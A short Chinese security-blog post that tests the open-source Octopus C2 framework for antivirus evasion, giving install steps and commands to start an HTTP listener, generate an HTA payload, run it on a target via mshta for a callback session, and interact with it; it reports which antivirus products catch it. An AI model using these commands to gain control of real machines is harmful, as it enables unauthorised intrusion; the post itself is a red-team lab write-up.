前言
这几天看到一个开源的c2,据说可以免杀。特地来试试。测试机装了火绒杀毒和360安全卫士。
项目地址
https://github.com/mhaskar/Octopus
介绍
Octopus是基于python3的开源项目,可进行操作的C2服务器,可以通过HTTP / S控制Octopus powershell代理。
创建Octopus的主要目的是要在任何红队作战之前使用,而无需开始与您的整个作战武库和基础设施接触,您可以先使用八达通来攻击目标并收集信息,然后再开始实际的红队作战而无需使您的实际基础架构面临风险!
Octopus中的一项很酷的功能称为ESA,它表示“端点态势感知”,它将收集有关目标的一些重要信息,这些信息将帮助您更好地了解您在操作过程中将面对的目标网络端点。您可以根据此信息自定义您的实际操作。
Octopus旨在与C2进行通信时隐秘而隐秘,因为它在Powershell代理和C2服务器之间的加密通道默认使用AES-256。您还可以通过为您的域提供有效的证书并配置Octopus C2服务器以使用它来选择使用SSL / TLS。
特点
安装
1先把项目glone下来
<code>git clone https://github.com/mhaskar/Octopus.git/<code>
2下载需要用的包
<code>pip install -r requirements.txt/<code>
3Octopus依赖于mono-csc件来编译C#源代码,您可以通过以下命令安装
<code>apt install mono-devel/<code>
4启动Octopus
<code>python3 octopus.py/<code>
使用
下面简单演示一下listen_http
创建一个监听,输入listen_http可以看到全部参数
<code>listen_http 0.0.0.0 8080 192.168.43.231 5 1.php listener1/<code>
生成一个hta
<code>generate_hta listener1/<code>
在靶机利用mshta执行hta(mshta是什么之前文章有讲过)
即可收到反弹的session
利用interact命令开始交互
试一试report命令
最后测试得出,火绒会拦截。360好废!
更多姿势自行探索
閱讀更多 safe6安全 的文章
關鍵字: 免杀 PowerShell 渗透